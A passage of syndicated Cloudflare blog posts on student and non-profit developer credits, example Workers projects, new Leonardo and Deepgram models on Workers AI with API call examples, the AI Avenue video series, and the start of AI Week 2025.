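As a worked example of the overage arithmetic, the estimator below uses two monthly-metered rows from the table: Workers requests and Queues operations. It assumes overage is pro-rated linearly per million units beyond the included amount, and it ignores any other billing dimensions. Treat it as a rough illustration, not as Cloudflare's billing logic.

```typescript
// Included monthly amounts and per-million overage rates, taken from the table above.
const RATES = {
  workersRequests: { includedPerMonth: 10_000_000, usdPerExtraMillion: 0.3 },
  queuesOperations: { includedPerMonth: 1_000_000, usdPerExtraMillion: 0.4 },
} as const;

// Assumption: overage is pro-rated linearly per million units above the included amount.
function estimateOverageUsd(kind: keyof typeof RATES, usedPerMonth: number): number {
  const { includedPerMonth, usdPerExtraMillion } = RATES[kind];
  const extra = Math.max(0, usedPerMonth - includedPerMonth);
  return (extra / 1_000_000) * usdPerExtraMillion;
}

console.log(estimateOverageUsd("workersRequests", 15_000_000)); // 1.5
console.log(estimateOverageUsd("queuesOperations", 800_000)); // 0
```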

Access to a dedicated student developer community

You’ll also have access to a dedicated Discord channel just for students. We want to see what you’re building! This is a place to connect with peers, get support, and share ideas in a community of student developers.

What others have built with Cloudflare’s Developer Platform

Curious about what’s possible with Cloudflare’s developer features? Here are some projects from our community:

by Daniel Foldi


Adventure is a text-based adventure game running on Cloudflare Workers that uses Workers AI to generate the stories with the @cf/google/gemma-3-12b-it model. 

The project’s developer chose Workers AI with the OpenNext adapter because it made deployment simple and handled scaling automatically. It uses the Workers Paid plan mainly to enable Workers Logpush and get access to detailed logs for better monitoring and analysis.

When a new game starts, the server gives the AI a custom prompt to set the scene and explain how the adventure should work. From there, each time the player makes a choice, their story history is sent back to the server, which asks the AI to continue the narrative, allowing the story to evolve dynamically based on the player’s choices.

The code below shows how this logic is implemented:

"use server";
import { getCloudflareContext } from "@opennextjs/cloudflare";

async function prime(env: CloudflareEnv) {
  const id = Math.floor(Math.random() * 1000000);//unique ID for each game run
  const messages = [
    {
      role: "user",
      content:
        `The user is playing a text-based adventure game. Each game is different, this is game ${id}. Your first job is to create a short background story in 3-4 sentences. Scenarios may include interesting locations such as jungles, deserts, caves.
        After the first message, each of your messages will be responses to the user interaction. State three short options (A, B, C). The user responses will be the chosen action. Your responses should end by asking the user about their choice.
        Your message will be shown to the user directly, so avoid "Certainly", "Great", "Let's get started", and other filler content, and avoid bringing up technical details such as "this is game #id".
        The games should have a win condition that is actually feasible given the story, and if the player loses, the message should end with "Try again.".
        `,
    },
  ];
  //Call Workers AI to generate the first response (story intro)
  const { response } = await env.AI.run("@cf/google/gemma-3-12b-it", { messages });

  return [
    ...messages,
    { role: "assistant", content: response }
  ];
}

/**
 * Main server action for the adventure game.
 * If no input yet, it primes the game with the opening story
 * If there is input, it continues the story based on the full history
 * Uses getCloudflareContext from @opennextjs/cloudflare to access env.
 */
export async function adventureAction(input: any[]) {
  let { env } = await getCloudflareContext({ async: true });

  return input.length === 0
  ? await prime(env)
  : [...input,
      { role: "assistant", content: (await env.AI.run("@cf/google/gemma-3-12b-it", { messages: input })).response }
  ];
}

by Matt Cowley


DNS over Discord is a bot that lets you run DNS lookups right inside Discord. Instead of switching to a terminal or online tool, you can use simple slash commands to check records like A, AAAA, MX, TXT, and more.

The developer behind the project chose Cloudflare Workers because it’s a great platform for running small JavaScript apps that handle requests, which made it a good fit for Discord’s slash commands. Since every command translates into a request and the bot sees a lot of traffic, the free tier wasn’t enough, so it now runs on Workers Paid to keep up reliably without hitting request limits.

In this project, the Worker checks if the request is a Discord interaction, and if so, it sends it to the right command (e.g., /dig, /multi-dig, etc.), using a handler that calls out to a custom framework for Discord slash commands. If it’s not from Discord, it can also serve routes like the privacy page or terms of service.

Here’s what that looks like in code:

export default {
  // Process all requests to the Worker
  fetch: async (request, env, ctx) => {
    try {
      // Include the env in the context we pass to the handler
      ctx.env = env;

      // Check if it's a Discord interaction (or a health check)
      const resp = await handler(request, ctx);
      if (resp) return resp;

      // Otherwise, process the request
      const url = new URL(request.url);

      if (request.method === 'GET' && url.pathname === '/privacy')
        return new textResponse(Privacy);

      if (request.method === 'GET' && url.pathname === '/terms')
        return new textResponse(Terms);

      // Fallback if nothing matches
      return new textResponse(null, { status: 404 });
    } catch (err) {
      // Log any errors
      captureException(err);

      // Re-throw the error
      throw err;
    }
  },
};

by James Ross


placeholders.dev is a service that generates placeholder images, making it easy for developers to prototype and scaffold websites without dealing with hosting or asset management. Users can generate placeholders instantly with a simple URL, such as: https://images.placeholders.dev/350x150

Since placeholders are typically used in early development, speed and consistency matter, and images need to load instantly so the workflow isn’t interrupted. Running on Cloudflare Workers makes the service fast and consistent no matter where developers are.

This project uses the Workers Paid plan because it regularly exceeds the free-tier limits on requests and compute time. The Worker below shows the core of how the service works. When a request comes in, it looks at the URL path (like /300x150) to determine the size of the placeholder, applies some defaults for style, and then returns an SVG image on the fly.

export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext) {
    try {
      const url = new URL(request.url);
      const cache = caches.default;

      // Handle requests for the placeholder API
      if (url.host === 'images.placeholders.dev' || url.pathname.startsWith('/api')) {
        // Try edge cache first
        const cached = await cache.match(url, { ignoreMethod: true });
        if (cached) return cached;

        // Default placeholder options
        const imageOptions: Options = {
          dataUri: false, // always return an unencoded SVG source
          width: 300,
          height: 150,
          fontFamily: 'sans-serif',
          fontWeight: 'bold',
          bgColor: '#ddd',
          textColor: 'rgba(0,0,0,0.5)',
        };

        // Parse sizes from path (e.g. /350 or /350x150)
        const sizeParts = url.pathname.replace('/api', '').replace('/', '').split('x');
        if (sizeParts[0]) {
          const width = sanitizeNumber(parseInt(sizeParts[0], 10));
          const height = sizeParts[1] ? sanitizeNumber(parseInt(sizeParts[1], 10)) : width;
          imageOptions.width = width;
          imageOptions.height = height;
        }

        // Generate SVG placeholder
        const response = new Response(simpleSvgPlaceholder(imageOptions), {
          headers: { 'content-type': 'image/svg+xml; charset=utf-8' },
        });

        // Cache result
        response.headers.set('Cache-Control', 'public, max-age=' + cacheTtl);
        ctx.waitUntil(cache.put(url, response.clone()));

        return response;
      }

      return new Response('Not Found', { status: 404 });
    } catch (err) {
      console.error(err);
      return new Response('Internal Error', { status: 500 });
    }
  },
};
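The Worker above depends on helpers defined elsewhere in the project (`sanitizeNumber`, `simpleSvgPlaceholder`, and the `cacheTtl` constant). The sketch below is a self-contained stand-in for the first two, for illustration only: the names `sanitizeSize`, `parseSize`, and `renderPlaceholderSvg`, the clamping bounds (1 to 4000 pixels), and the SVG markup are all assumptions, not the service’s real behavior.

```typescript
interface PlaceholderOptions {
  width: number;
  height: number;
  bgColor: string;
  textColor: string;
  fontFamily: string;
  fontWeight: string;
}

// Hypothetical bounds: reject NaN or non-positive values, clamp large ones.
function sanitizeSize(value: number, fallback: number): number {
  if (!Number.isFinite(value) || value < 1) return fallback;
  return Math.min(Math.floor(value), 4000);
}

// Parse "/350", "/350x150", or "/api/350x150" into a width and height.
function parseSize(pathname: string, defaults = { width: 300, height: 150 }) {
  const [w, h] = pathname.replace(/^\/api/, "").replace(/^\//, "").split("x");
  if (!w) return { ...defaults };
  const width = sanitizeSize(parseInt(w, 10), defaults.width);
  // A single number produces a square, mirroring the Worker above.
  const height = h ? sanitizeSize(parseInt(h, 10), defaults.height) : width;
  return { width, height };
}

// Render a simple SVG with the dimensions printed in the middle.
function renderPlaceholderSvg(o: PlaceholderOptions): string {
  const label = `${o.width}x${o.height}`;
  return (
    `<svg xmlns="http://www.w3.org/2000/svg" width="${o.width}" height="${o.height}" viewBox="0 0 ${o.width} ${o.height}">` +
    `<rect width="100%" height="100%" fill="${o.bgColor}"/>` +
    `<text x="50%" y="50%" dominant-baseline="middle" text-anchor="middle" ` +
    `font-family="${o.fontFamily}" font-weight="${o.fontWeight}" fill="${o.textColor}">${label}</text>` +
    `</svg>`
  );
}
```

In the Worker, the returned string would be sent with `content-type: image/svg+xml; charset=utf-8`, as in the original code, and cached at the edge in the same way.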

Check out Built With Workers to see what other developers are building with our developer platform.


How do I get started?

This offering is available to United States students at least 18 years old with a verified .edu billing email address.

Based on when your account was created, you can redeem this offer either by signing up for a free Cloudflare account with your .edu email or by filling out a form to request access for your existing .edu account. Just make sure your verified .edu email address is your billing email address.

How to redeem, by account creation date:

  • New .edu accounts (created on or after September 22, 2025): Sign up for a free Cloudflare account, add your credit card, and make sure your verified .edu email address is added to your billing details.

  • Existing .edu accounts (created before September 22, 2025): Make sure your verified .edu email address is added to your billing details, then fill out our form and a member of our team will help you get access.

Note: to receive the credit, your verified .edu email address needs to be your billing email address.

Expanding Cloudflare for Students coverage

While our first offering is primarily for institutions in the US, we’re working on expanding support for our students in other countries and plan to add additional higher education domain names after launch. If you’re at an educational institution outside of the United States, please reach out to us and apply for your educational/academic domain to be added. We’ll let you know as soon as it becomes available in your region. Check our Cloudflare for Students page for updates and keep an eye out for emails if you have an account with a newly supported domain.

Whether you’re gearing up for your first hackathon, launching a side project, or looking to build the next big thing, you can get started today with free access and join a global developer community already building on Cloudflare.

Get started by signing up or requesting access today.


Free access to Cloudflare developer services for non-profit and civil society organizations

Post Syndicated from Patrick Day original https://blog.cloudflare.com/expanding-startups-for-nonprofits/

We are excited to announce that non-profit, civil society, and public interest organizations are now eligible to join Cloudflare for Startups. Under this new program, participating organizations will be eligible to receive up to $250,000 in Cloudflare credits — these can be used for a variety of our developer and core products, including databases & storage, compute services, AI, media, and performance and security.

Non-profit organizations and startups have a lot in common. In addition to being powered by small groups of dedicated, resilient, and creative people, they are constantly navigating funding shortages, staffing challenges, and insufficient tools. Most importantly, both are unrelenting in their efforts to do more with less; maximizing the impact of every dollar spent and hour invested.

Cloudflare’s developer services and our startup programs were designed for exactly these challenges. Our goal is to make it easier for anyone to write code, build applications, and launch new ideas anywhere in the world. Put another way, we want to help small teams have a global impact.

All are welcome to apply. The application period for this new program opens today and runs until December 1. After it closes, Cloudflare will review the applications we’ve received and make award decisions based on each project’s description, requirements, and impact.

If you are a non-profit organization that wants to build innovative full-stack applications on Cloudflare for free, with built-in security, high performance, near-limitless scale, and optimization for AI training, inference, and security, apply today!

Coming together in a challenging year

2025 has been a difficult year for non-profits. According to a recent survey of non-profit leaders, decreased government funding, an uncertain economic environment, and greater demand for services have made it increasingly difficult for many organizations to operate. Although some private foundations have responded by increasing their grantmaking and other contributions, significant gaps remain.

We also know that the non-profit sector has significant tech needs. The Nonprofit Technology Network (NTEN) reports that almost half of non-profits surveyed believed that they spent too little on technology, with 77% reporting the primary barrier was lack of available budget. Only 14% reported receiving grants to specifically help with technology projects. 

Many organizations are facing difficult choices. And, sadly, many have been forced to discontinue operations.

However, we have also seen remarkable resilience and determination first-hand. Many of the organizations we work with regularly are doing the incredibly difficult work of diversifying their funding, reshaping their organizations, and finding new ways to accomplish their missions — including greater emphasis on and investment in new technologies. We also continue to see dynamic growth of new non-profit startups working to step in and fill gaps to help solve problems in new, innovative ways.

We want to help. 

Cloudflare is the place for startups

Cloudflare is the best place on the Internet to build and launch a startup, in part because our developer tools were designed to help small teams build big things. Building on Cloudflare’s network provides direct access to the scalable computing power, storage, media, and AI needed to build full-stack applications. And, because applications built with Cloudflare are automatically deployed to our global network, developers can spend less time worrying about infrastructure and performance and more time on their ideas.

More than 4,000 startups have received free credits since Cloudflare launched its startup program during 2024’s Birthday Week. Since 2024, 175 startups in 23 countries have also participated in Cloudflare’s Workers Launchpad Program, which provides even more support and resources including hands-on assistance and training from Cloudflare engineers, introductions to our venture capital partners, and opportunities to present at Cloudflare Demo Days.

Impact organizations are often startups, too

Regardless of their size, non-profits and startups often share a similar mentality. They tend to be mission-driven, operate with limited resources, and are constantly forced to innovate and adapt to survive. 

Above all, they rely on small teams to make an outsized impact.

We understand these challenges. Our developer services were designed to allow small teams to focus on ideas and code instead of the time-consuming aspects of managing a global network, security, and scaling. Building directly on the Cloudflare Network allows developers to instantly scale and deploy new technologies all over the world. 

One example of a non-profit already building on Cloudflare is Kendraio, an independent non-profit organization that has built an open source integration platform designed to help others solve problems. Kendraio creates user-friendly tools with customizable interfaces and no-code logic, allowing anyone to build complex functions across different applications. Its pilot projects demonstrate this, including a knowledge graph for diplomats working on nuclear disarmament, a shared wholesale database for independent bookstores, and a dashboard that simplifies news subscriptions for readers and publishers.

Interested? Here’s how to apply 

The application period to join Cloudflare’s first class of non-profit organizations participating in Cloudflare for Startups is open now, and will close on December 1, 2025.

Cloudflare’s Impact and Startup teams will review the applications and select a cohort of non-profit, civil society, and public interest organizations to participate in the program. These organizations will have the opportunity to receive up to $250,000 in Cloudflare credits, which can be used for certain usage-based services including databases & storage, compute services, AI, media, and performance & security tools. For full details, visit cloudflare.com/startups.

To qualify, organizations should meet the following criteria:

  • Be a registered 501(c)(3) non-profit organization or equivalent

  • Provide a description of the tool you plan to build or scale with Cloudflare. 

Applications for Cloudflare’s first class of non-profit startup participants are open until December 1, 2025. This will be our first non-profit class to join our Startups program. However, we hope there will be more to follow. Keep checking the Cloudflare blog for more updates.

To apply, simply visit our application page and select the non-profit checkbox.

State-of-the-art image generation Leonardo models and text-to-speech Deepgram models now available in Workers AI

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/workers-ai-partner-models/

When we first launched Workers AI, we made a bet that AI models would get faster and smaller. We built our infrastructure around this hypothesis, adding specialized GPUs to our datacenters around the world that can serve inference to users as fast as possible. We created our platform to be as general as possible, but we also identified niche use cases that fit our infrastructure well, such as low-latency image generation or real-time audio voice agents. To lean in on those use cases, we’re bringing on some new models that will help make it easier to develop for these applications.

Today, we’re excited to announce that we are expanding our model catalog to include closed-source partner models that fit these use cases. We’ve partnered with Leonardo.Ai and Deepgram to bring their latest and greatest models to Workers AI, hosted on Cloudflare’s infrastructure. Leonardo and Deepgram both have models with a great speed-to-performance ratio that suit the infrastructure of Workers AI. We’re starting off with these great partners, but expect to expand our catalog to other partner models as well.

The benefit of using these models on Workers AI is that we don’t just offer a standalone inference service; we also have an entire suite of Developer products that let you build whole applications around AI. If you’re building an image generation platform, you could use Workers to host the application logic, Workers AI to generate the images, R2 for storage, and Images for serving and transforming media. If you’re building real-time voice agents, we offer WebRTC and WebSocket support via Workers; speech-to-text, text-to-speech, and turn detection models via Workers AI; and an orchestration layer via Cloudflare Realtime. All in all, we want to lean into use cases where we think Cloudflare has a unique advantage, back them with developer tools, and make it all available so that you can build the best AI applications on top of our holistic Developer Platform.
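A minimal sketch of the image generation flow described above: a Worker asks Workers AI for an image and stores the bytes in R2. The AI and R2 bindings are typed as small hypothetical interfaces (`AiLike`, `BucketLike`) so the logic can run outside a Worker. It assumes the image model returns an object with a base64-encoded `image` field; check the model’s documentation for the actual output schema. The function name, key, and content type are illustrative.

```typescript
// Narrow, hypothetical views of the Workers AI and R2 bindings, so the
// logic can be exercised without the Workers runtime.
interface AiLike {
  run(model: string, inputs: Record<string, unknown>): Promise<unknown>;
}
interface BucketLike {
  put(
    key: string,
    value: Uint8Array,
    options?: { httpMetadata?: { contentType?: string } },
  ): Promise<unknown>;
}

// Decode base64 into raw bytes (atob exists in Workers and Node 16+).
function base64ToBytes(b64: string): Uint8Array {
  return Uint8Array.from(atob(b64), (c) => c.charCodeAt(0));
}

// Generate an image with Workers AI and store it in R2 under `key`.
// Assumes the model returns { image: "<base64>" }; verify for your model.
async function generateAndStore(
  ai: AiLike,
  bucket: BucketLike,
  model: string,
  prompt: string,
  key: string,
  contentType: string,
): Promise<string> {
  const result = (await ai.run(model, { prompt })) as { image?: string } | null;
  if (!result?.image) throw new Error("Model response had no base64 image field");

  await bucket.put(key, base64ToBytes(result.image), { httpMetadata: { contentType } });
  return key; // Later requests can serve or transform the stored object by key.
}
```

Keeping generation and storage in one Worker means the application never has to round-trip image bytes through a client; Images can then serve resized variants from the stored original.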

Leonardo Models

Leonardo.Ai is a generative AI media lab that trains its own models and hosts a platform for customers to create generative media. The Workers AI team has been working with Leonardo for a while now and has experienced the magic of their image generation models firsthand. We’re excited to bring on two image generation models from Leonardo: @cf/leonardo/phoenix-1.0 and @cf/leonardo/lucid-origin.

“We’re excited to enable Cloudflare customers a new avenue to extend and use our image generation technology in creative ways such as creating character images for gaming, generating personalized images for websites, and a host of other uses… all through the Workers AI and the Cloudflare Developer Platform.” – Peter Runham, CTO, Leonardo.Ai 

The Phoenix model is trained from the ground up by Leonardo and excels at things like text rendering and prompt coherence. The full image generation request took 4.89s end-to-end for a 25-step, 1024×1024 image.

curl --request POST \
  --url https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/leonardo/phoenix-1.0 \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: application/json' \
  --data '{
    "prompt": "A 1950s-style neon diner sign glowing at night that reads '\''OPEN 24 HOURS'\'' with chrome details and vintage typography.",
    "width":1024,
    "height":1024,
    "steps": 25,
    "seed":1,
    "guidance": 4,
    "negative_prompt": "bad image, low quality, signature, overexposed, jpeg artifacts, undefined, unclear, Noisy, grainy, oversaturated, overcontrasted"
}'

The Lucid Origin model is a recent addition to Leonardo’s family of models and is great at generating photorealistic images. The image took 4.38s to generate end-to-end at 25 steps and a 1024×1024 image size.

curl --request POST \
  --url https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/leonardo/lucid-origin \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: application/json' \
  --data '{
    "prompt": "A 1950s-style neon diner sign glowing at night that reads '\''OPEN 24 HOURS'\'' with chrome details and vintage typography.",
    "width":1024,
    "height":1024,
    "steps": 25,
    "seed":1,
    "guidance": 4,
    "negative_prompt": "bad image, low quality, signature, overexposed, jpeg artifacts, undefined, unclear, Noisy, grainy, oversaturated, overcontrasted"
}'
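Inside a Worker, the same request could go through the AI binding instead of the REST API. The helper below (`runLeonardo`, a hypothetical name) fills in the parameters used in the curl examples above (1024×1024, 25 steps, seed 1, guidance 4) as defaults and lets callers override any of them. The `ai` parameter is typed as a minimal interface so the sketch runs without the Workers runtime; in a Worker you would pass `env.AI`.

```typescript
interface AiLike {
  run(model: string, inputs: Record<string, unknown>): Promise<unknown>;
}

interface ImageParams {
  width: number;
  height: number;
  steps: number;
  seed: number;
  guidance: number;
  negative_prompt?: string;
}

// Defaults copied from the curl examples above.
const DEFAULTS: ImageParams = { width: 1024, height: 1024, steps: 25, seed: 1, guidance: 4 };

type LeonardoModel = "@cf/leonardo/phoenix-1.0" | "@cf/leonardo/lucid-origin";

function runLeonardo(
  ai: AiLike,
  model: LeonardoModel,
  prompt: string,
  overrides: Partial<ImageParams> = {},
): Promise<unknown> {
  // Caller-supplied values win over the defaults; the result is returned untouched.
  return ai.run(model, { prompt, ...DEFAULTS, ...overrides });
}
```

For example, `await runLeonardo(env.AI, "@cf/leonardo/phoenix-1.0", "A 1950s-style neon diner sign", { seed: 42 })` sends the same body as the first curl command with a different seed.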

Deepgram Models

Deepgram is a voice AI company that develops its own audio models, allowing users to interact with AI through a natural interface for humans: voice. Voice is an exciting interface because it carries more information than text; beyond the words themselves, speech conveys signals like pacing and intonation. The Deepgram models that we’re bringing to our platform perform extremely fast speech-to-text and text-to-speech inference. Combined with Workers AI’s infrastructure, they let customers build low-latency voice agents and more.

“By hosting our voice models on Cloudflare’s Workers AI, we’re enabling developers to create real-time, expressive voice agents with ultra-low latency. Cloudflare’s global network brings AI compute closer to users everywhere, so customers can now deliver lightning-fast conversational AI experiences without worrying about complex infrastructure.” – Adam Sypniewski, CTO, Deepgram

@cf/deepgram/nova-3 is a speech-to-text model that can quickly transcribe audio with high accuracy. @cf/deepgram/aura-1 is a text-to-speech model that is context aware and can apply natural pacing and expressiveness based on the input text. The newer Aura 2 model will be available on Workers AI soon. We’ve also improved the experience of sending binary MP3 files to Workers AI, so you no longer have to convert them into a Uint8Array first. Along with our Realtime announcements (coming soon!), these audio models are the key to enabling customers to build voice agents directly on Cloudflare.

With the AI binding, a call to the Nova 3 speech-to-text model would look like this:

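// Avoid naming this `URL`, which would shadow the global URL class
const audioUrl = "https://www.some-website.com/audio.mp3";
const mp3 = await fetch(audioUrl);
if (!mp3.ok) throw new Error(`Failed to fetch audio: ${mp3.status}`);

// Stream the MP3 body straight to the model
const res = await env.AI.run("@cf/deepgram/nova-3", {
  audio: {
    body: mp3.body,
    contentType: "audio/mpeg",
  },
  detect_language: true,
});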
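The binding call returns the model’s JSON result. Assuming it follows Deepgram’s usual response shape (`results.channels[].alternatives[].transcript`, plus `detected_language` on each channel when language detection is on), small helpers can pull out the top transcript defensively. The `NovaResult` type and helper names are hypothetical; verify the exact schema on the Workers AI model page.

```typescript
// Assumed subset of a Deepgram-style transcription result.
interface NovaResult {
  results?: {
    channels?: {
      detected_language?: string;
      alternatives?: { transcript?: string; confidence?: number }[];
    }[];
  };
}

// Return the first channel's top transcript, or an empty string if absent.
function extractTranscript(res: NovaResult): string {
  return res.results?.channels?.[0]?.alternatives?.[0]?.transcript ?? "";
}

// Return the language detected for the first channel, if any.
function extractLanguage(res: NovaResult): string | undefined {
  return res.results?.channels?.[0]?.detected_language;
}
```

Optional chaining keeps the helpers from throwing on partial or error responses, which matters when the transcript feeds directly into the next stage of a voice agent.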

With the REST API, it would look like this:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/deepgram/nova-3?detect_language=true' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: audio/mpeg' \
  --data-binary @/path/to/audio.mp3
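Outside a Worker, the same REST call can be built with the standard Fetch API. In this sketch `buildNovaRequest` is a hypothetical helper, and the account ID and token are placeholders, as in the curl example. It only constructs the `Request`, so it can be inspected before being sent with `fetch(request)`.

```typescript
// Build the same request as the curl example: raw MP3 bytes in the body.
function buildNovaRequest(accountId: string, token: string, audio: ArrayBuffer): Request {
  const url = new URL(
    `https://api.cloudflare.com/client/v4/accounts/${accountId}/ai/run/@cf/deepgram/nova-3`,
  );
  url.searchParams.set("detect_language", "true");

  return new Request(url, {
    method: "POST",
    headers: {
      Authorization: `Bearer ${token}`,
      "Content-Type": "audio/mpeg",
    },
    body: audio,
  });
}
```

Sending it is then `const res = await fetch(buildNovaRequest(accountId, token, bytes));` followed by `await res.json()`.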

We’ve also added WebSocket support to the Deepgram models, which lets you keep a connection to the inference server open for bi-directional input and output. To use the Nova model with WebSocket support, check out our Developer Docs.

All the pieces work together so that you can:

  1. Capture audio with Cloudflare Realtime from any WebRTC source

  2. Pipe it via WebSocket to your processing pipeline

  3. Transcribe with Deepgram’s audio models running on Workers AI

  4. Process with your LLM of choice through a model hosted on Workers AI or proxied via AI Gateway

  5. Orchestrate everything with Realtime Agents
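The steps above can be modeled as a chain of async stages. The sketch below wires hypothetical `transcribe`, `think`, and `speak` functions together for a single conversational turn. In a real deployment these would call Workers AI models (for example Nova 3 and Aura 1) and be driven by Realtime Agents, whose APIs are not shown here; the interface and function names are illustrative.

```typescript
// Each stage is an async function; real implementations would call models.
interface VoiceStages {
  transcribe(audio: Uint8Array): Promise<string>;
  think(transcript: string, history: string[]): Promise<string>;
  speak(reply: string): Promise<Uint8Array>;
}

interface TurnResult {
  transcript: string;
  reply: string;
  audio: Uint8Array;
}

// Run one conversational turn: speech-to-text -> LLM -> text-to-speech.
async function runTurn(stages: VoiceStages, audio: Uint8Array, history: string[]): Promise<TurnResult> {
  const transcript = await stages.transcribe(audio);
  if (transcript.trim() === "") {
    // Nothing was said: skip the LLM and return silence.
    return { transcript, reply: "", audio: new Uint8Array(0) };
  }
  const reply = await stages.think(transcript, history);
  // Keep the running conversation so the LLM sees earlier turns next time.
  history.push(`user: ${transcript}`, `assistant: ${reply}`);
  return { transcript, reply, audio: await stages.speak(reply) };
}
```

Injecting the stages keeps the orchestration logic independent of any one model, so swapping the LLM (or routing it through AI Gateway) only changes the `think` implementation.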

Try these models out today

Check out our developer docs for more details, pricing and how to get started with the newest partner models available on Workers AI.

Cloudflare Launching AI Miniseries for Developers (and Everyone Else They Know)

Post Syndicated from Peter Saulitis original https://blog.cloudflare.com/welcome-to-ai-avenue/

If you’re here on the Cloudflare blog, chances are you already understand AI pretty well. But step outside our circle, and you’ll find a surprising number of people who still don’t know what it really is — or why it matters.

We wanted to come up with a way to make AI intuitive, something you can actually see and touch to get what’s going on. Hands on, not just hand-wavy.

The idea we landed on is simple: nothing comes into the world fully formed. Like us, and like the Internet, AI didn’t show up fully formed. So we asked ourselves: what if we told the story of AI as it learns and grows?

Episode by episode, we’d give it new capabilities, explain how those capabilities work, and explore how they change the way AI interacts with the world. Giving it a voice. Letting it see. Helping it learn. And maybe even letting it imagine the future.

So we made AI Avenue, a show where I (Craig) explore the fun, human, and sometimes surprising sides of AI… with a little help from my co-host Yorick, a robot hand with a knack for comic timing and the occasional eye-roll. Together, we travel, talk to incredible people, and get hands-on with AI to show it’s not just something to read about. It’s something you can touch, try, and enjoy.


The idea behind AI Avenue

We wanted to make something that would strip away the jargon and make AI approachable, friendly, and most importantly, fun.

In AI Avenue, we address people’s fears, show them the art of the possible, and highlight the positive human stories where AI is augmenting — not replacing — what people can do. And yes, we even let people touch AI themselves. Also yes, the previous paragraphs “intentionally included” a few em-dashes.

The result? A fast-paced, playful series that mixes demos, interviews, and real-world examples, all showing AI as something you can explore, question, and use in ways that matter to you.

You can sign up now to be notified when each episode drops and learn more about the journey at aiavenue.show.


Who we worked with

We had an absolute blast partnering with some of the most exciting players in the space:

  • Anthropic — on building safe, aligned AI models.

  • Engineered Arts — creators of the humanoid robot Ameca, who makes several appearances throughout the series.

  • ElevenLabs — powering lifelike voice synthesis.

  • HeyGen — creating realistic AI-generated video avatars and translations.

  • Roboflow — enabling computer vision projects with powerful image datasets and tools.

  • Be My Eyes — using AI and volunteers to make the world more accessible for people who are blind or have low vision.

  • Writer — bringing enterprise-grade generative AI into real-world workflows.

Episodes: One Ability at a Time

Across six episodes, we follow Yorick’s upgrades and occasional misadventures as he learns to talk, see, think, and even imagine the future.

Episode 1: Voice — We start in London where Yorick gets his voice and immediately starts chiming in on everything.

Episode 2: Vision — In San Francisco, Yorick tries computer vision for the first time. We watch someone go shopping for the first time.

Episode 3: Thinking — Hosting a live trivia stream online, Yorick begins confidently spouting answers that aren’t quite true. We head to New York City to meet someone whose life was saved by ChatGPT.

Episode 4: Learning — Yorick discovers generative AI and decides he can make the show himself, spawning multiple Craig clones and raising questions about ethics and creativity.

Episode 5: Doing — It turns out everyone we talk to just wants a robot to do their dishes. We dig into what “doing” means in AI and robotics and whether Yorick is on board.

Episode 6: Smell — In our finale, we explore the agentic AI future, quantum computing, and big sci-fi dreams, then hang out with a 9-year-old vibe coder because, well, the children are the future.

Get hands-on

Every episode is paired with developer tutorials so you can experiment with the same AI tools that we feature. No matter your skill level, you can tinker, build, and see for yourself what AI can do. We strongly believe the most important thing you can do right now is to touch AI, play with it. Now is the time.

Follow along the avenue

Yorick and I will be releasing each episode of AI Avenue as it’s ready, and we’d love to have you along for the ride.

Sign up to be notified when new episodes launch and explore more about the show at aiavenue.show.


Welcome to AI Week 2025

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/welcome-to-ai-week-2025/

We are watching in real time as AI fundamentally changes how people work in every industry. Customer support agents can respond to ten times the tickets. Software engineers review AI-generated code instead of spending hours pounding out boilerplate. Salespeople can get back to building relationships instead of tedious follow-up and administration.

This technology feels magical, and Cloudflare is committed to helping companies build world class AI-driven experiences for their employees and customers.

There is a catch, however. Whenever a new technology with such widespread appeal emerges, it tends to outpace the tools in place to govern, secure, and control it. We’re already starting to see stories of vibe-coded apps leaking all their users’ details. LLM chats that were meant to be shared only between colleagues are turning up on the web, indexed by search engines for all the world to see. AI agents are being given the keys to the application kingdom, enabling them to work autonomously across an organization, but without proper tracking and control. And then there’s the risk of a well-meaning employee uploading confidential company or customer data into an LLM, which then uses it to train future models.

Beyond internal data used for LLM training, content creators and media companies are also faced with a decision about how they want LLM scrapers and information retrieval bots to interact with their content. Cloudflare has found that it can be hundreds, or even thousands, of times harder to generate site traffic (and therefore ad revenue) from an AI response versus a search engine result.

We’re hearing more and more of these stories from CISOs, CIOs, creators, and even CEOs. These leaders face a difficult choice: clamp down on all AI usage and bots, or let them run wild. There needs to be something in between. And for that to be a real option, the tools to manage and secure AI need to catch up to AI itself.

This week, that’s what Cloudflare is focused on. Welcome to AI Week! Over the coming week, we will focus on four core areas to help companies secure and deliver AI experiences safely and securely:

  • Securing AI environments and workflows: AI is incredibly powerful. The problem is that innovation is outpacing control, and we want to change that. As one of the few zero trust providers also building out AI infrastructure for the web, we’re uniquely positioned to do so.

  • Protecting original content from misuse by AI: AI companies are devouring organic content as quickly as it’s created, and creators aren’t seeing any benefit. We want to give content creators control over the content they have worked so hard to develop.

  • Helping developers build world-class, secure AI experiences: the possibilities for developers to create new applications on top of (or even built with) AI are endless. We want to let developers create AI-driven applications that run as close to users as possible, with security controls built in from day one.

  • Making Cloudflare better for you with AI: AI is changing the nature of interfaces. For example, finding and mitigating issues buried in thousands or millions of logs and events across website, employee, and email usage used to be tedious, but AI can make it easy. We’re working day and night to integrate AI into Cloudflare itself to make things more efficient for ourselves and our customers.

Securing AI environments and workflows

As Artificial Intelligence innovation continues to accelerate at an unprecedented pace, the speed of its development is increasingly outpacing the implementation of robust security controls. This rapid advancement, while promising immense benefits, simultaneously introduces novel and complex security challenges that traditional measures are often ill-equipped to address. Organizations are finding themselves grappling with the inherent risks of adopting powerful AI tools without adequate safeguards, leading to vulnerabilities such as Shadow AI and the uncontrolled proliferation of AI models, making the development of specialized AI security paramount.

As we look around the zero trust space, none of the other providers are moving fast enough to keep up with AI’s pace of innovation. This is something we know a thing or two about — and after this week, if you’re worried about governing AI usage inside your organization, we will have you covered. 

